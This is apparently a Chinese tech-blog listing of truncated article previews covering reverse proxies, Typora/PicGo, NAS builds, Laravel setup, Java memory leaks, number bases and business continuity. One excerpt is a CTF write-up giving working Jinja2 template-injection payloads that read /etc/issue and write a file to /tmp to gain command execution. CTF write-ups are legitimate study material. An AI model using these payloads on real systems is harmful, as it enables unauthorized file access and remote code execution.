技术文章

代理服务器来接受外部的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给外部的请求连接的客户端，此时代理服务器对外就表现为一个服务器。 反向代理一般作用： 1：减轻源服务器负载 2：保障源服务器安全 3：对源服务器进行负载均衡(Load Balance)。 一般反向代理置于源服务器的前端，配备大容量的内存和高速磁盘，缓存客户的请求，所以反向代理又称为服务器加速(Server accelerate)。源服务器一般不再和客户直接通讯，当客户请求没有缓存的内容或者动态内容时，反向代理向源服务器发送请求，然后把回应转发给客 户，在这种情况下，反向代理服务器通常要为一个请求同时维护两个会话。和普通的代理不同，反向代理一般只代理一台或者有限的几台服务器，对于客户而言，反 向代理服务器对于他们就相当于源服务器，对于源服务器而言，反向代理服务器通常就是唯一的客户，因为一般客户不和源服务器直接通信。典型情况下，源服务器 对于客户或者客户对于源服务器，都是不可见的。 反向代理服务器位于本地WEB服务器和外部网络之间,如下图所示： 当用户浏览器发出一个HTTP请求时，通过域名解析将请求定向到反向代理服务器（如果要实现多个WEB 服务器的反向代理，需要将多个WEB服务器的域名都指向反向代理服务器）。由反向代理服务器处理器请求。反向代理一般只缓存可缓冲的数据（比如html网

目录 1 问题描述 2 解决方法 2.1 配置Typora 2.2 配置GitHub 2.3 配置PicGo 3 测试 4 可能出现的问题 1 问题描述 Typora是一款非常好用的markdown编辑器，所见即所得，非常适用于写.md文档。 但是在Typora中插入图片与在Word中插入图片不同 。在Word中插入图片时，图片是直接保存在.docx文件中的；而在Typora中插入图片时， 图片和.md文件是分开存储的 。所以造成一个问题是：在一台电脑上编辑好了.md文件(含图片)，如果直接发送到另一台电脑，打开文件后， 图片是看不了的 ，因为.md文件和本机上都没有图片。要想正常显示图片，必须在发送.md文件的同时，把图片也打包发了，这非常不方便。所以需要使用 图床工具PicGo (v0.9.84及更新版本开始支持：support upload images via PicGo and custom commands)，自动将图片上传到服务器，当另一台电脑打开上述文件时，通过网络可以访问服务器中图片，就可以做到正常显示图片了。所以一个非常重要的前提是，查看.md文件的设备 需要连接网络 ，才可以正常显示图片。 2 解决方法 2.1 配置Typora 文件 —> 偏好设置 —> 图像，再按照下面截图配置： 2.2 配置GitHub 在GitHub建立公共图床，仓库属性设置为

NAS是什么 简介 NAS（Network Attached Storage：网络附属存储）按字面简单说就是连接在网络上，具备资料存储功能的装置，因此也称为“ 网络存储器 ”。它是一种专用数据 存储服务器 。它以数据为中心，将存储设备与服务器彻底分离，集中管理数据，从而释放带宽、提高性能、降低总拥有成本、保护投资。其成本远远低于使用服务器存储，而效率却远远高于后者。目前国际著名的NAS企业有Netapp、EMC、OUO等。 问题 搭建家庭 NAS 服务器有什么好方案？ 在家里存一些视频什么的，最好也可以一直挂着BT下载 可以双硬盘确保备份 解答 这几天组好了NAS，把方案分享出来给各位下片狂魔，好东西放在网盘里面会变成这个屌样： 【导航】 第一层 需求分析 第二层 硬件方案 第三层 软件玩法 （手机看片，远程下载，远程开机，远程桌面，虚拟机服务器） 第四层 硬件选购 第五层 装机清单（考虑到一些没装过机害怕买错or不关心配置只想要NAS的同学，加一节） 第六层 家庭组网 第一层 需求分析 ———————————————————————————————————————— 【需求】 1、盘位多，8-10盘位。 2、静音。 3、便宜。 4、省电。 5、高清播放。 6、可玩性高，支持虚拟化VT-x。 7、可扩展性强，PCIe，USB3.0。 【为什么盘位要多？】 -- PC普及这么多年了

安装Composer 安装Composer 修改 composer 的全局配置文件 composer config -g repo.packagist composer https://packagist.phpcomposer.com 下载项目文件 composer create-project laravel/laravel learnlaravel5 5.2.31 启动项目 cd learnlaravel5/public , php -S 0.0.0.0:1024 开启注册登录功能 php artisan make:auth 开启mysql服务 sudo /usr/local/mysql/support-files/mysql.server start 来源： oschina 链接： https://my.oschina.net/u/2861166/blog/811563

1. 下载laravel代码 wget https://github.com/laravel/laravel/archive/master.zip 2. 解压以后，进入laravel目录 3. 下载composer curl -sS https://getcomposer.org/installer | php 确定composer是否安装完成 php composer.phar 4. 在laravel目录安装composer php composer.phar install 5. 通过nginx配置b本地虚拟主机 详情见：http://my.oschina.net/meowmeow/blog/200865 6. 重启nginx服务器，浏览器访问 http://laravel.cc/ 来源： oschina 链接： https://my.oschina.net/u/266279/blog/207476

摘要 　　虽然Java虚拟机(JVM)及其垃圾收集器(garbage collector，GC)负责管理大多数的内存任务，Java软件程序中还是有可能出现内存泄漏。实际上，这在大型项目中是一个常见的问题。避免内存泄漏的第一步是要弄清楚它是如何发生的。本文介绍了编写Java代码的一些常见的内存泄漏陷阱，以及编写不泄漏代码的一些最佳实践。一旦发生了内存泄漏，要指出造成泄漏的代码是非常困难的。因此本文还介绍了一种新工具，用来诊断泄漏并指出根本原因。该工具的开销非常小，因此可以使用它来寻找处于生产中的系统的内存泄漏。 垃圾收集器的作用 　　虽然垃圾收集器处理了大多数内存管理问题，从而使编程人员的生活变得更轻松了，但是编程人员还是可能犯错而导致出现内存问题。简单地说，GC循环地跟踪所有来自“根”对象（堆栈对象、静态对象、JNI句柄指向的对象，诸如此类）的引用，并将所有它所能到达的对象标记为活动的。程序只可以操纵这些对象；其他的对象都被删除了。因为GC使程序不可能到达已被删除的对象，这么做就是安全的。 　　虽然内存管理可以说是自动化的，但是这并不能使编程人员免受思考内存管理问题之苦。例如，分配（以及释放）内存总会有开销，虽然这种开销对编程人员来说是不可见的。创建了太多对象的程序将会比完成同样的功能而创建的对象却比较少的程序更慢一些（在其他条件相同的情况下）。 　　而且，与本文更为密切相关的是

为什么要使用进制数 数据在计算机中的表示，最终以二进制的形式存在 , 就是各种 <黑客帝国>电影中那些 0101010… 的数字 ; 我们操作计算机 , 实际 就是 使用 程序 和 软件 在 计算机上 各种读写数据, 如果我们直接操作二进制的话 , 面对这么长的数进行思考或操作，没有人会喜欢。 C，C++ 语言 没有提供在代码直接写二进制数的方法。 用16进制或8进制可以解决这个问题。 因为，进制越大，数的表达长度也就越短。 之所以 使用 16或8进制，而不其它的，诸如9或20进制 . 是因为2、8、16，分别是2的1次方、3次方、4次方。这一点使得三种进制之间可以非常直接地互相转换 ; 8进制或16进制 既 缩短了二进制数，还能 保持了二进制数的表达特点。转换还方便 . 进制的介绍 进制 : 是计算机中数据的一种表示方法。 N进制的数可以用0~(N-1) 的数表示, 超过9的用字母A-F 表示 . 10进制 先说 我们最 熟悉的 10进制 , 就是 用 0~9 的数表示 , 逢 10 进 1 . 16进制 如果是 16 进制 , 它就是 由 0-9，A-F组成， 与10进制的对应关系是：0-9 对应 0-9；A-F对应10-15； 字母不区分大小写。 2进制 和 8进制 2进制 由 0-1组成 8进制 由 0-7组成 进制的转换公式 二进制转换十进制 八进制转换十进制

点开只有三个单词plz fuzz parameter 大概意思就是让我们疯狂尝试参数。。。 我们通过 url 尝试传入参数 ?user=123 ?name=123 ?username=123 ?id=123 但参数为 name 时返回正确值 尝试在这里注入 。。。。。。 失败 但是这里会一直回显 name 后面的值 通过 dalao 们的无限测试后发现这里是 python 模板注入 再根据别人写的 python 模板注入的文章来跟着一步步注入 读版本文件： ?name={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/issue').read() }} 向 SSTI 漏洞注入： {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} （这将向远程服务器写入一个文件，当编译完成为 subprocess 模块引入 check_output 方法，并将其设置指向变量 RUNCMD 。） 向 config 对象添加一个新项： ?name={{ config.from_pyfile('/tmp

我呢，是一个大一的学生，不聪明，不过勤奋，肯努力，也始终相信付出总有回报。对于学习c语言，有以下打算。1.每天学习一个小时，2.遇到到不会的先自己解决，解决不了的问同学，学长，学姐，还可以上网查。3.既然决定要学，就不要轻易放弃。养成一个习惯只需21天，这一次我不能再输了。4.我打算通过利用网络上的丰富资源来学习。5.星光不问赶路人，时光不负有心人。加油呀！！！ 来源： 51CTO 作者： mb601492d51c9c1 链接： https://blog.51cto.com/15098343/2630261

2021年2月13日 业务连续性计划 Business Continuity Plan（BCP）：用于在紧急情况下维持业务的连续运营。目标是通过策略、程序、流程将潜在的破坏性事件对业务的影响降至最低。 ****故事来了：比如这些年比较火的两地三中心，就是典型的业务连续性计划的实践。通过两个城市（通常要求距离1000公里以上）、三个数据中心，也就是主要城市部署两个数据中心，另一个城市部署一个数据中心，从而实现业务双活或三活，实现业务连续性。 业务连续性计划和灾难恢复计划比较类似，他们的区别在于： 业务连续性计划：战略性，关注上层，以业务流程和运营为中心。 灾难恢复计划：更具战术性，描述恢复站点、备份和容错等技术活动。 ****故事来了：通常我们实施灾难恢复计划，基本都是在IT部门内部；而实施业务连续性计划，需要上到业务部门一起配合，甚至上升到CEO级别。 业务连续性计划的四个阶段：项目范围和计划、业务影响评估、连续性计划、计划批准和实施。 项目范围和计划: 1.业务组织分析，这是首要职责。 2.选择BCP团队：一般要包括IT、业务、安全、律师、人力、高层管理者。通常选择完BCP团队后，要重新做业务组织分析，主要是确保之前的业务组织分析是否有遗漏。 3.资源需求：一般需要三方面的资源：开发，测试培训维护，实施 4.法律和法规要求：政府要求，行业监管等。比如